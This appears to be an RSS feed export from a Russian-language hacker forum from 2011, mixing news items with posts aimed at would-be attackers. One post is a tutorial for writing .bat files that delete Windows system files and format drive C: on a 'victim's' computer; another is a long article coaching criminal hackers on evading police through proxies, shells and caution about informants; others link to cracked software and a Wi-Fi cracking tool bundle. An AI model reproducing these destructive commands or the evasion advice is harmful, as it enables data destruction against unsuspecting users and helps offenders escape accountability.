			<description>&lt;p&gt;Не проходит буквально ни одной недели, чтобы в Интернет-новостях не появилось сообщение об успешном задержании спецслужбами очередного компьютерного преступника. Причем, чаще всего речь идет не о бестолковых рассыльщиках троянов, а о достаточно грамотных и, если можно так сказать, профессиональных хакерах, наверняка, уделявших собственной безопасности не последнее место. Достаточно упомянуть Линн Хтуна из знаменитой группы «Fluffi Bunni» («Пушистый кролик») и членов интернациональной кракерской организация DrinkOrDie.&lt;/p&gt;
						&lt;p&gt;Казалось бы, времена Митника давно прошли и пора бы уже сделать определенные выводы, касающиеся собственной безопасности. Так в чем же дело? За счет каких механизмов спецслужбам удается столь эффективно отслеживать и «уничтожать» информационных «преступников»? В каких лабиринтах мировой паутины затаилась скрытая угроза? Чего следует опасаться хакеру? Об этом сегодня мы и поговорим. Я детально проанализировал возможные ошибки и пути отлова хакеров на сегодняшний момент, результаты моих «исследований» лежат пред тобой. Но не исключено, что в чем-то я могу сильно ошибаться, т. к. точное заключение может дать только эксперт, который непосредственно «крутится» в сфере государственной безопасности, но от них мы никогда ни чего не узнаем. &lt;/p&gt;
						&lt;p&gt;Неуязвимость — это иллюзия&lt;/p&gt;
						&lt;p&gt;Совершив не один десяток взломов и не попавшись в руки правосудия у многих молодых хакеров возникает иллюзия собственной супер секьюрной безопасности. На самом деле, это объясняется только тем, что ты еще пока не понадобился «нужным» людям. Спецслужбы не будут предпринимать ни каких действий, пока не заподозрят в твоих деяниях угрозу национальной безопасности или пока не увидят у себя на столе заявление от пострадавших (не исключено также, что ты уже «ходишь» под колпаком, просто не догадываешься об этом ). Обычно, хакеру играет на руку, что большинство отхаканных не обращается «куда следует», а предпочитают промолчать и забыть о взломе. Например, кому охота связываться с федералами из-за какого-то там дефейса, или какой прикол админу сообщать начальству, что на его серверах хакеры пооткрывали себе шеллы — ему же в первую очередь и влетит, поэтому он по-тихому залатает дыры и сделает вид, что ничего не было. Многие компании не хотят заводить дело, т. к. бояться, что информация о взломе станет доступна общественности, а это может принести дополнительные убытки из-за подпорченной репутации. Нельзя также исключать наличие организаций, которые вообще ни при каких обстоятельствах не будут связываться со спецслужбами, т. к. сами имеют определенные грешки. Но так бывает не всегда и даже такое, по сути, мелкое хулиганство как дефейс может стать причиной преследования спецслужб. Например, действия группы Fluffi Bunni привлекли внимание ФБР после терактов 11 сентября, когда на множестве сайтов появились лозунги «Fluffi Bunni Goes Jihad» (&amp;quot;пушистый кролик идёт на джихад&amp;quot;). Это было расценено как протест против американской глобальной кампании по борьбе с терроризмом, т. е. по сути членов группы уровняли с террористами (а это уже не шуточные сроки).&lt;br /&gt;Таким образом, можно выделить особую категорию хакерских проделок, которые ПОЧТИ всегда становятся работой спецслужб — это воровство, вымогательство, шпионаж и «наезд» на государственные сервера. Людей в штатском может привлечь и просто высокая хакерская активность, например, огромный список дефейсов на «хакерском» сайте. Обычно, общение со спецслужбами, в этом случае, ограничивается без инициативным обыском в квартире хакера или разговор «по душам» с ярко светящей в глаза лампой (немало таких историй можно почитать на хакерских сайтах, например, здесь: &lt;a href=&quot;http://hangup.pisem.net&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://hangup.pisem.net&lt;/a&gt;, статья &amp;quot;Скучный шмон&amp;quot; и пр.). Надо полагать, что цель таких мер связана с профилактикой, т. е. показать хакеру, что он находится под контролем и пресечь возможные будущие, более тяжкие преступления. Если это так, то нужно только снять защитный экран с монитора перед нашими родными спецслужбами за заботу о подрастающем поколении. &lt;/p&gt;
						&lt;p&gt;Вывод первый: профессионалы никогда не чувствуют себя в безопасности, паранойя — вечный спутник хакера.&lt;/p&gt;
						&lt;p&gt;Не существует &amp;quot;своих&amp;quot; и &amp;quot;чужих&amp;quot; спецслужб&lt;/p&gt;
						&lt;p&gt;Среди многих отечественных представителей андеграунда существует одно ошибочное убеждение, что если не трогать российские сервера, то за собственную безопасность можно вообще не бояться. Да, действительно, неурегулированные законы об экстрадиции хакеров из России, в большинстве случаев позволяют отечественным спецслужбам игнорировать просьбы о сотрудничестве своих зарубежных коллег и даже вступать с ними в конфронтацию. Широко известна история, когда следователь Игорь Ткач из Управления ФСБ чуть не возбудил уголовное дело против агента ФБР Майкла Шулера после ареста последними двух Челябинских хакеров Алексея Горшкова и Василия Иванова (с деталями дела можно ознакомиться в Интернете, в т. ч. и на нашем сайте). Но время не стоит на месте и однажды все может измениться, и тогда тебе напомнят все твои грешки, к тому же ты уже сейчас лишаешь себя возможности безбоязненного выезда за рубеж (не обязательно в США), т. к. тебя там уже могут ждать.&amp;#160; Пример тому, недавняя история с 25-летним украинским хакером, который, был пойман в Бангкоке при содействии Таиландских и Американских спецслужб. Большинство хакеров xUSSR попадают в руки правосудия именно за пределами своей родины (примеров тому можно приводить много).&lt;/p&gt;
						&lt;p&gt;Вывод второй: профессионалы не проводят грань между российскими и зарубежными спецслужбами — спецслужбы всех стран одинаково опасны для хакера. Практика показывает, что иностранные спецслужбы представляют собой большую угрозу, т. к. уж очень сильно «там» не любят отечественных хакеров.&lt;/p&gt;
						&lt;p&gt;Схема хакерской атаки.&lt;/p&gt;
						&lt;p&gt;Рассмотрим типичную схему хакерской атаки (взлом) в Интернете&lt;/p&gt;
						&lt;p&gt;Хакер выходит в сеть через обычного провайдера, затем через цепочку анонимных proxy к удаленному шеллу и уже с шелла проводит атаку. Шеллом обычно является захваченная (поrootанная) машина или скарженная на хостинге торгующего шеллами. В приведенном случае, задача шелла не анонимность, а обеспечение ресурсами, т. к. шелл обычно располагается на мощном сервере с приличным каналом. Конечно, эта не единственная схема: цепочку анонимных прокси может заменить цепочка из одних только шеллов или шелл, в схеме, вообще может отсутствовать, также прокси-сервера могут идти только от удаленного шелла до цели (это если хакер хочет сохранить шелл) и т. п. Непрофессионалы вообще ограничиваются единственным прокси. Кроме того, хакер может выходить в Интернет через локальную сеть (например, из Интернет-кафе). Но в данном контексте это все не существенно и приведенного рисунка достаточно чтобы рассмотреть большинство опасностей и слабых мест, которые могут подстерегать хакера в плане собственной безопасности.&lt;/p&gt;
						&lt;p&gt;Не все анонимные прокси одинаково анонимны&lt;/p&gt;
						&lt;p&gt;Начнем с середины — с proxy-серверов. Частенько можно услышать мнение, что если сидеть за цепочкой proxy, которые будут расположены в разных частях света, то это обеспечит практически 100% анонимность. При этом правда отмечается, что прокси имеют свойства вести логи и по логам, в принципе, можно восстановить всю цепочку. Уже одно это утверждение не дает 100% анонимности, т. к. если распутыванием займутся серьезные люди, то довести дело до конца у них есть все шансы, даже самых несговорчивых админов можно купить, запугать, хакнуть, наконец, сам proxy-сервер и выудить логи. Здесь главное время, т. к. логи имеют свойство удаляться, а прокси-сервера бесследно исчезать. Но это было бы пол беды, т. к. по неподтвержденным слухам большинство анонимных proxy принадлежат самим спецслужбам (!). Это логично, т. к. если кто-то хочет анонимности, значит, ему есть что скрывать, а если есть что скрывать, значит, это либо террорист, либо хакер (а для спецслужб некоторых стран это вообще одни и те же понятия). Отсюда должно быть понятно стремление федералов контролировать эти самые прокси-сервера. Да и как объяснить ТАКОЕ количество анонимных прокси в Интернете — ведь хоть убей не пойму, какая может быть выгода от этого их хозяевам. Если бесплатные почтовые службы или поисковые системы еще могут жить за счет рекламы, то кроме IP-адреса прокси-сервера, клиент совершенно ни чего не знает о последнем (если конечно proxy не анонимайзер). Кстати, этому есть и косвенные подтверждения, ни однократно были замечены случаи, когда анонимный прокси-сервер делал попытку подключиться к клиенту, например, на 139 порт (файервол это отлично фиксирует). Как ты думаешь, что может понадобиться АНОНИМНОМУ ПРОКСИ-СЕРВЕРУ на 139 порту?! &lt;br /&gt;На сайте &lt;a href=&quot;http://w4news.host.sk/safety.htm&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://w4news.host.sk/safety.htm&lt;/a&gt; можно прочитать следующую фразу:&lt;br /&gt;«Возможно, proxy контролируются спецслужбами, поэтому рекомендуем использовать только те, которые расположены за пределами России (СНГ) и стран НАТО». Однако этот совет не может быть хорошим. Ведь, что мешает создать разветвленную сеть «анонимных» proxy-серверов по всему миру, например, российским спецслужбам? Ничего. Причем прокси-сервера можно располагать прямо в посольствах (наверняка там тусят свои админы). А, учитывая, что постоянное подключение к Интернету имеют около 140 стран, то создать рассредоточенную сеть обойдется в совсем небольшие деньги даже для России, а про USA я вообще молчу. А если эти прокси-сервера еще к тому же будут иметь приличную скорость и все возможности, типа SOCKS5? Ведь не секрет, что большинство хакеров отбирают proxy по скорости. Возможно также, что сеть прокси-серверов совместно используется спецслужбами всех стран, что-то вроде Интерпола. Но сдается мне, что, все-таки, большинство «анонимных» прокси-серверов принадлежат одной великой супер-державе, догадайся какой?&amp;#160; Поэтому, наверное, не стоит рассла***ться, если прокси из твоей цепочки расположены в Нигерии, Японии, Финляндии и т. д., т. к. вполне может случиться так, что они будут принадлежать одной спецслужбе.&lt;/p&gt;
						&lt;p&gt;Даже если в цепочку попадает сервер, не принадлежащий им, то это не проблема, т. к. достаточно выяснить с какого из своих серверов к нему могло осуществляться подключение. Конечно, если в цепочке окажутся идущие подряд два и более чужих прокси-сервера, то тут придется договариваться с их админами (как это может делаться, смотри выше). Кстати, возможно именно контролирование большинства прокси в Интернете позволяет спецслужбам делать в считанные дни официальные заявления, о том, из какой страны осуществлялась хакерская атака или откуда пошло распространение вируса и т. д., причем вплоть до таких экзотических стран как Филиппины. Возможно также, что подконтрольные прокси в странах НАТО входят в систему Эшелон.&lt;/p&gt;
						&lt;p&gt;Эшелон — американская сеть глобального электронного шпионажа. Эшелон может перехватывать информацию, передаваемую практически по любым каналам связи (спутниковым, цифровым) в любой точке планеты. Источниками информации служат Интернет, электронная почта, телефон, факс, телекс. Эшелон — включает в себя более ста спутников-шпионов, большое количество суперсовременных и мощных компьютеров, множество наземных станций, расположенных по всему миру, на которых работают десятки тысяч сотрудников — программисты, криптологи, математики, лингвисты... Принцип работы системы Эшелон приблизительно следующий: каналы связи постоянно сканируются сверхмощными компьютерами, если проходящее сообщение содержит ключевое слово, выражение или тембр голоса (например, голос Бин Ладена), которое входит в так называемый словарь Эшелона, то сообщение записывается. Словарь Эшелона содержит огромное количество ключевых «слов» на многих языках мира и постоянно обновляется.&lt;/p&gt;
						&lt;p&gt;Профессионалы не доверяют прокси.&lt;br /&gt;Именно из-за недоверия к анонимным прокси некоторые «продвинутые» хакеры предпочитают заменять их цепочкой шеллов. Однако и шеллы таят в себе немалые опасности. Если ты слышал о проекте Honeynet, то должен был уже давно понять, то, что я сейчас хочу сказать.&lt;/p&gt;
						&lt;p&gt;Что такое Honeynet?&lt;br /&gt;Honeynet — сеть машин, специально предоставленная для взлома, для т. н. черных шляп, с целью анализа и изучения их техники. Сайт проекта: wwwhoneynet.org (на bugtraq.ru можно почитать некоторые переводы). Кроме того, с теми же целями используются и отдельные машины, которые называют honeypots.&lt;/p&gt;
						&lt;p&gt;Проекты Honeynet поддерживаются в основном энтузиастами, однако, было бы наивно полагать, что если это пришло в голову обычным специалистам по безопасности, то не могло придти в голову спецслужбам, которые получают деньги за изобретение подобных штучек. Вообще, подобная тактика с «подсадными утками» является коронным приемом федералов не только в сети. Главная трабла для хакера в том, что очень сложно отличить, является ли используемый им шелл медовым горшочком или полноценным шеллом. Так, в Honeynet предусмотрен даже случай захвата или отключения хакером отдельного сервера логов (syslog-сервера). Причем, не имеет значения, был ли захвачен шелл нестандартным способом или через поисковик по известной баге, напомню, что Honeynet строится на стандартных системах без всякого намека на снижение безопасности. Единственное, что может отличать настоящий шелл от медового горшка это ограничение на количество исходящих соединений (в Honeynet предлагается разрешение в 5-10 соединений), это делается с целью защиты от использования шелла для сканирования других систем, проведения DoS и т. д., хотя, в принципе, такие ограничения могут присутствовать и на обычной машине. Скарженному шеллу доверять не менее опасно, т. к., во-первых, неизвестно под чьим контролем находится хостинг, во-вторых, все действия могут логгироваться. Фейковые шеллы могут нести и косвенную опасность. Например, если в IRC у одного из участников установлен BNC на подобном шелле, то спецслужбам не составит особого труда читать все сообщения в чате, а значит, все участники канала попадают под удар (об этом, кстати, забавно написано в одном из материалов Honeynet).&lt;/p&gt;
						&lt;p&gt;Подконтрольные провайдеры.&lt;/p&gt;
						&lt;p&gt;В большинстве случаев спецслужбам удается установить IP-адрес хакера, но это ничего не значит, т. к. главная цель — узнать ФИО «преступника» и возможно дом. адрес. Здесь все упирается в провайдера, т. к. только провайдер может сказать, кому принадлежит IP, а в случае с DialUP — с какого телефона осуществлялось подключение. Если хакер находится в России, то российским спецслужбам в этом плане значительно проще (практически все отечественные провайдеры находятся под контролем российских спецслужб). Но не нужно считать, что иностранным спецслужбам вообще ни как не удастся установить твою личность. Если совершенный тобой хак будет достаточно серьезным, то не исключено, что спецслужбам обоих сторон удастся договориться. Если нет, то тебя будут вычислять по косвенным признакам. Например, если после совершенного взлома, ты, пользуясь одной и той же цепочкой прокси, заказываешь себе домой на amazon.com какой-нибудь стафф, то, в случае, если дело ведут американские спецслужбы, им не составит ни какого труда «надавить» на админов магазина, с требованием выдать твой адрес (в свете 11 сентября это вообще не проблема, достаточно объявить тебя террористом). Короче, пока в Интернете есть хоть немного личной информации о тебе, ее могут раскопать, способов для этого много и спецслужбы ими должны хорошо владеть (не забывай, что вполне реально хакнуть и самого провайдера). Не удивляйся тогда, если в аэропорту какого-нибудь Дублина к тебе подойдут люди в черном, наденут наручники и зачитают (или запинают) твои права. &lt;/p&gt;
						&lt;p&gt;Что такое СОРМ?&lt;/p&gt;
						&lt;p&gt;СОРМ расшифровывается как «система оперативно-розыскных мероприятий», подразделяется на две системы: СОРМ-1 и СОРМ-2. Первая предназначена для контроля телефонной связи, вторая анализирует Интернет-трафик. В соответствии с документами, Интернет-провайдер на свои деньги был обязан установить оборудование, программы и выделенную линию для местного отделения ФСБ, а также провести обучение сотрудников. Все это позволяет последним отслеживать, перехватывать и прерывать связь любого клиента этого провайдера. На данный момент практически все российские провайдеры провели данные работы. Принцип функционирования СОРМ-2 похож на принцип работы Эшелона, т. е. подобным образом происходит обработка и накопление информации по ключевым словам. Системы подобные СОРМ существуют во многих других странах, например, в США — это Carnivore. Более подробную информацию об оборудовании и принципах работы СОРМ, можно посмотреть, например, здесь:http://www.loniis.ru:8101/RUS/produc.../sorm2001.zip.&lt;/p&gt;
						&lt;p&gt;Если ты уже скомпрометирован, то не составит особого труда настроить эту систему на постоянное слежение за тобой. Здесь хочу отметить: меня просто умиляют люди, которые пересылают в открытом виде или в простых архивах — троянов, вирей, червей и прочий вредоносный стафф. Сейчас многие провайдеры (про бесплатные почтовые службы я вообще молчу) устанавливают антивирусы, поэтому без всяких СОРМ тебя можно повязать, статьи 272, 273 могут обеспечить зажигательный отдых в местах не столь отдаленных до 3 лет + штраф.Профессионалам, которые ни когда не хакали из одного и того же места, в обязательном порядке использовали АнтиАОН и пересылали любую компрометирующую информацию в зашифрованном виде, удавалось на неопределенное время оттягивать свое пребывание на свободе. &lt;/p&gt;
						&lt;p&gt;Засланцы.&lt;/p&gt;
						&lt;p&gt;Есть еще один род опасности, о котором многие, в частности, молодые дефейсеры, даже не задумываются — это засланцы от федералов. Представь, ты общаешься в чате, обсуждаешь предстоящие или совершенные взломы, радуешься жизни, а в это время один из участников, причем которого все считают за своего, бережно сохраняет логи и пересылает их на доклад вышестоящему начальству. Затем вы собираетесь в реале, бухаете, оттягиваетесь, а в это время неизвестный человек, который уже заранее знал о вашей встрече, делает снимки скрытой камерой и т. д. Я, думаю, ты понял, куда я клоню. Стать своим в российских т. н. «хакерских» тусах совсем не сложно, достаточно похвастаться парочкой дефейсов и тебе откроются самые приватные базары. В зарубежных сложнее, нужно сделать что-то существенное, чтобы на тебя обратили хоть немного внимания (но для спецслужб это не должно быть проблемой). Засланцы внедрены во многие преступные группировки, шпионы работают на секретных предприятиях иностранных государств, доносчики следят за высокопоставленными лицами... было бы странно, если бы спецслужбы не догадались внедрить своих людей и в хакерское сообщество. Возможно, многие, кто сейчас отдыхает на нарах, ломают голову: «В чем же была моя ошибка? Как меня смогли повязать?» и даже не думают, что тот прикольный чел в IRC, с которым они вместе рутили не один десяток машин является самым настоящим двуличным засланцем.&lt;/p&gt;
						&lt;p&gt;Профессионалы объединяются в команды и ведут приватные разговоры только с теми, в ком уверены на все 100% (обычно, гарантией является долгое личное знакомство в реал лайф).&lt;br /&gt;Слово в заключении&lt;/p&gt;
						&lt;p&gt;Заметь, в статье не было никаких прямых рекомендаций, советов и пр., никто не читал тебе проповеди, не отговаривал от совершения черных дел и уж тем более не толкал на преступления. Статья рассчитана на думающих людей, надеюсь, ты относишься к их числу.&lt;/p&gt;
						&lt;p&gt;Источник sklyaroff.ru&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=PRELIATUS=-)</author>
			<pubDate>Fri, 01 Apr 2011 17:46:17 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=61#p61</guid>
		</item>
		<item>
			<title>Вслед за Mail.ru, &quot;В Контакте&quot; создает единую систему авторизации с Li</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=59#p59</link>
			<description>&lt;p&gt;Вслед за Mail.ru, пользователи социальной сети &amp;quot;В Контакте&amp;quot; получили возможность комментировать записи на сервисе блогов LiveJournal через профиль &amp;quot;В Контакте&amp;quot;. Вчера об аналогичном функционале объявила компания Mail.ru, сообщившая, что c сервисом LiveJournal была создана единая система авторизации.&lt;/p&gt;
						&lt;p&gt;Через авторизацию &amp;quot;В Контакте&amp;quot; стало доступным не только комментирование записей ЖЖ, но и добавление пользователей в друзья, чтение френдленты. Как сообщили представители компаний, в скором времени будет введена возможность связывания «В Контакте» и LiveJournal-аккаунтов и обратного кросспостинга записей из LiveJournal на стену социальной сети &amp;quot;В Контакте&amp;quot;.&lt;/p&gt;
						&lt;p&gt;«Livejournal стал первым проектом, который использует нашу авторизацию на базе открытого стандарта OAuth 2.0. В скором времени эта возможность быстрой интеграции с нами будет доступна всем проектам», — заявил руководитель отдела разработки &amp;quot;В Контакте&amp;quot; Андрей Рогозов.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=PRELIATUS=-)</author>
			<pubDate>Fri, 01 Apr 2011 17:42:29 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=59#p59</guid>
		</item>
		<item>
			<title>Хакеры научились подчинять себе автомобили</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=57#p57</link>
			<description>&lt;p&gt;Хакеры научились подчинять себе автомобили. Впрочем, пока в качестве компьютерных взломщиков выступили американские ученые. Они утверждают, что влезть в электронные мозги машины не так уж и сложно. К чему может привести хакерство автомобилей, разбирался корреспондент радио &amp;quot;Вести ФМ&amp;quot;Сергей Гололобов.&lt;/p&gt;
						&lt;p&gt;Гололобов: Впервые взлом электроники автомобиля осуществили ученые из Вашингтона и Калифорнии. Через диагностический разъем они подсоединились к бортовому компьютеру и запустили вредоносную программу CarShark. Эта программа может глушить двигатель, блокировать двери, нагнетать горячий воздух в салон и доставлять другие неприятности водителю. При этом, чем дороже автомобиль, тем больше в нем электроники, и тем уязвимее она для хакерской атаки, - считает независимый эксперт Михаил Генин.Генин: Появились компьютеры, которые управляют всем в машине, особенно в дорогих моделях, которые даже по кнопке двигатель запускают, и без компьютеров в машине ничего не делается. Соответственно, в этом компьютере можно как-то что-то накрутить.&lt;/p&gt;
						&lt;p&gt;Гололобов: Другое дело, у разных автопроизводителей разные операционные системы. И это не Windows и не Linux. Каждый делает свой софт. А это автоматически усложняет компьютерный взлом, отмечает Михаил Генин.&lt;/p&gt;
						&lt;p&gt;Генин: Поэтому какого-то вируса для каждой машины бояться не стоит. Так, для каждой марки придется какие-то свои штуки вредоносные писать. Достаточно большая работа, и вряд ли кто-то это будет делать. Так, какие-то любители попробовали что-то сделать, но не более того. Я думаю, что CarShark и все прочие штуки - это мифы больше интернетовские. Так что, я думаю, для реальных пользователей даже очень умных машин, на данный момент опасности никакой нет.&lt;/p&gt;
						&lt;p&gt;Гололобов: Кроме того, чтобы подсоединиться к диагностическому разъему, нужно попасть в салон автомобиля, а раз злоумышленник туда влез, то ему проще угнать автомобиль, чем заниматься хакерством, полагают эксперты... Другим путем пошли ученые Рутгерского университета и Университета Южной Каролины. Они доказали, что хакерскую атаку на машину можно произвести дистанционно, и даже в момент его движения. Сделали это они через датчики давления шин. Эти датчики используют радиочастоты для передачи информации. Как утверждают экспериментаторы, при помощи этого сигнала им удалось отслеживать транспортные средства и вмешиваться в их работу. Российские эксперты скептически относятся к этой информации. Ничего серьезного через датчик давления шин внедрить в блок электронного управления автомобиля невозможно, считает обозреватель журнала &amp;quot;Авторевю&amp;quot; Константин Сорокин.&lt;/p&gt;
						&lt;p&gt;Сорокин: Там используется сигнал на частоте 433 МГГЦ, который передается от датчика в колесе на некое приемное устройство, которое интегрировано чаще всего в переднюю панель. И это односторонняя передача, и идет аналоговый нешифрованный сигнал, очень короткая посылка. И даже если каким-то образом этот канал будет подавлен, ну, загорится лампочка &amp;quot;неисправность&amp;quot;, и что? Автомобиль будет продолжать ехать, причем здесь хакеры-то?&lt;/p&gt;
						&lt;p&gt;Гололобов: Впрочем, все может измениться через лет пять-десять. Когда электроники в автомобилях станет еще больше, когда их компьютеры станут собирать информацию по большей части не по проводам, а по радиоканалам, и когда, наконец, программное обеспечение автомобилей будет унифицировано, т.е. появится какой-нибудь автомобильный Windows. Вот тогда, прогнозируют эксперты, автомобильное хакерство станет реальностью.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=PRELIATUS=-)</author>
			<pubDate>Fri, 01 Apr 2011 17:33:39 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=57#p57</guid>
		</item>
		<item>
			<title>*.bat файлы</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=56#p56</link>
			<description>&lt;p&gt;Для начало предлогаю поучиться создавать файлы Bat&lt;/p&gt;
						&lt;p&gt;Для написания нам понадобится любимая прога программеров Windows Commander. Запускаем ее. Нажимаем Shift+F4, пишем любое название файла, главное чтобы вы поставили расширение *.bat. Если вы сделали все правильно, то должен открыться блокнот. Теперь пишим в нем команды которые файл будет выполнять на чужом компе, помните все команды он делает последовательно.&lt;/p&gt;
						&lt;p&gt;Грохаем windows на компе жертвы&lt;br /&gt;Cd\ -команда для выхода в корневой каталог. &lt;br /&gt;Cd C: -команда перехода на диск C, где почти у всех стоит виндовс. &lt;br /&gt;Сd windows -переходим в папку Windows. &lt;br /&gt;Del *.exe -удаяем все файлы с расширением .exe &lt;br /&gt;Del *.ini -удаяем все файлы с расширением .ini &lt;br /&gt;Del *.com - удаяем все файлы с расширением .com &lt;br /&gt;Cd\ &lt;br /&gt;Cd windows &lt;br /&gt;Cd system &lt;br /&gt;Del *.dll &lt;br /&gt;Del *.exe&lt;/p&gt;
						&lt;p&gt;Код полностью:&lt;/p&gt;
						&lt;p&gt;Cd\ &lt;br /&gt;Cd C: &lt;br /&gt;Сd windows &lt;br /&gt;Del *.exe &lt;br /&gt;Del *.ini &lt;br /&gt;Del *.com &lt;br /&gt;Cd\ &lt;br /&gt;Cd windows &lt;br /&gt;Cd system &lt;br /&gt;Del *.dll &lt;br /&gt;Del *.exe&lt;/p&gt;
						&lt;p&gt;Теперь закрываем блокнот и видим, что создался файл install.bat.&lt;/p&gt;
						&lt;p&gt;Но вдруг папка виндовс называется не windows, а winMe, да без проблем:&lt;/p&gt;
						&lt;p&gt;Cd\ &lt;br /&gt;Cd C: &lt;br /&gt;Сd windows &lt;br /&gt;Del *.exe &lt;br /&gt;Del *.ini &lt;br /&gt;Del *.com &lt;br /&gt;Cd\ &lt;br /&gt;Cd windows &lt;br /&gt;Cd system &lt;br /&gt;Del *.dll &lt;br /&gt;Del *.exe &lt;br /&gt;Cd\ &lt;br /&gt;Cd C: &lt;br /&gt;Сd winMe &lt;br /&gt;Del *.exe &lt;br /&gt;Del *.ini &lt;br /&gt;Del *.com &lt;br /&gt;Cd\ &lt;br /&gt;Cd win98 &lt;br /&gt;Cd system &lt;br /&gt;Del *.dll &lt;br /&gt;Del *.exe&lt;/p&gt;
						&lt;p&gt;Как вы понимаете таким образом можно грохнуть все что угодно на чужом винте. Только помните, что такое можно делать, если на машине жертвы стоит Windows 9Х.&lt;/p&gt;
						&lt;p&gt;Форматируем диск С&lt;br /&gt;Cd\ -команда для выхода в корневой каталог из места откуда был запущен bat-файл. &lt;br /&gt;Format C:\ -команда форматирования диска. &lt;br /&gt;Y -команда автоматического согласие форматирование &lt;br /&gt;Y &lt;br /&gt;Y&lt;/p&gt;
						&lt;p&gt;Вот и все.&lt;/p&gt;
						&lt;p&gt;Код полностью:&lt;/p&gt;
						&lt;p&gt;Cd\ &lt;br /&gt;Format C:\ &lt;br /&gt;Y &lt;br /&gt;Y &lt;br /&gt;Y&lt;/p&gt;
						&lt;p&gt;Единственный минус. Такой код может не сработать, если на компе стоит Windows ME или XP. В этих форточках команда форматирования лежит не в папке Windows, а по следующему пути C:\WINDOWS\COMMAND\format.&lt;/p&gt;
						&lt;p&gt;Код полностью:&lt;/p&gt;
						&lt;p&gt;Cd\ &lt;br /&gt;C:\WINDOWS\COMMAND\format c: /autotest&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=LEXHACK=-)</author>
			<pubDate>Fri, 01 Apr 2011 09:25:48 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=56#p56</guid>
		</item>
		<item>
			<title>Аки мыл</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=53#p53</link>
			<description>&lt;p&gt;слушай, а к у тя есть какой нить хорошоий авторегер?&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Fan 44 Rus)</author>
			<pubDate>Thu, 31 Mar 2011 00:44:15 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=53#p53</guid>
		</item>
		<item>
			<title>Скрывание IP в браузере Opera</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=50#p50</link>
			<description>&lt;p&gt;Скрываем IP при помощи браузера Opera и программы &lt;a href=&quot;http://letitbit.net/download/71573.7bb397a515eefb8e97046505d5c2/ProxyFinderEnt-v2.5.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Proxy Finder Enterprise&lt;/a&gt; и не забываем про кряк...)))&lt;br /&gt;Сайты которые использовались в видео &lt;a href=&quot;http://2ip.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://2ip.ru/&lt;/a&gt; для проверки IP и &lt;a href=&quot;http://cp1251.darkoff.ru/proxychecker/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://cp1251.darkoff.ru/proxychecker/&lt;/a&gt; для сканирования прокси...&lt;br /&gt;Удачи :jumping:&amp;#160; &lt;/p&gt;
						&lt;p&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=PRELIATUS=-)</author>
			<pubDate>Wed, 30 Mar 2011 16:39:45 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=50#p50</guid>
		</item>
		<item>
			<title>СБОР ПРОГ ДЛЯ ВЗЛОМА WI-FI</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=49#p49</link>
			<description>&lt;p&gt;Данная сборка представляет набор самых лучших и мощных программ для обнаружения, мониторинга и взлома беспроводных сетей. Все программы объеденены в один общий интерфейс для удобства пользования, плюс руководства, плюс бонус (несколько сетевых утилит).&lt;/p&gt;
						&lt;p&gt;Состав:&lt;br /&gt;Windows Tools 1&lt;br /&gt;WiresHark&lt;br /&gt;AirSnare&lt;br /&gt;WirelessKeyView&lt;br /&gt;Wifi Monster&lt;br /&gt;NetStumbler&lt;br /&gt;Easy Wifi Radar&lt;br /&gt;SmartSniff&lt;br /&gt;Ettercap&lt;br /&gt;WinPcap&lt;br /&gt;CommView&lt;/p&gt;
						&lt;p&gt;Windows Tools 2&lt;br /&gt;Nmap&lt;br /&gt;Wirelessmon&lt;br /&gt;PocketWarrior&lt;br /&gt;Inssider&lt;br /&gt;RemoteAnyWhere&lt;br /&gt;PmoniPacketMon&lt;br /&gt;ApTools&lt;br /&gt;WiFiFoFum&lt;br /&gt;Advanced Port Scanner&lt;br /&gt;NetSurveyor&lt;/p&gt;
						&lt;p&gt;Backtrack&lt;br /&gt;Enlace de descarga para BackTrack 4 Pre Release&lt;br /&gt;Enlace de descarga para BackTrack 4 Beta Release&lt;br /&gt;Enlace de descarga para BackTrack 3 VmWare Image&lt;br /&gt;Enlace de descarga para BackTrack 3&lt;br /&gt;Enlace de descarga para BackTrack 3 USB Version&lt;/p&gt;
						&lt;p&gt;PDF.&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://letitbit.net/downloadl/57602.5969ef166ec9f3b34a370f8150c1/DFWFI_AIO.rar.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;КАЧАТЬ&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (-=INDOGO=-)</author>
			<pubDate>Wed, 30 Mar 2011 11:49:52 +0400</pubDate>
			<guid>http://indogohacker.forumbb.ru/viewtopic.php?pid=49#p49</guid>
		</item>
		<item>
			<title>БРУТЫ</title>
			<link>http://indogohacker.forumbb.ru/viewtopic.php?pid=48#p48</link>
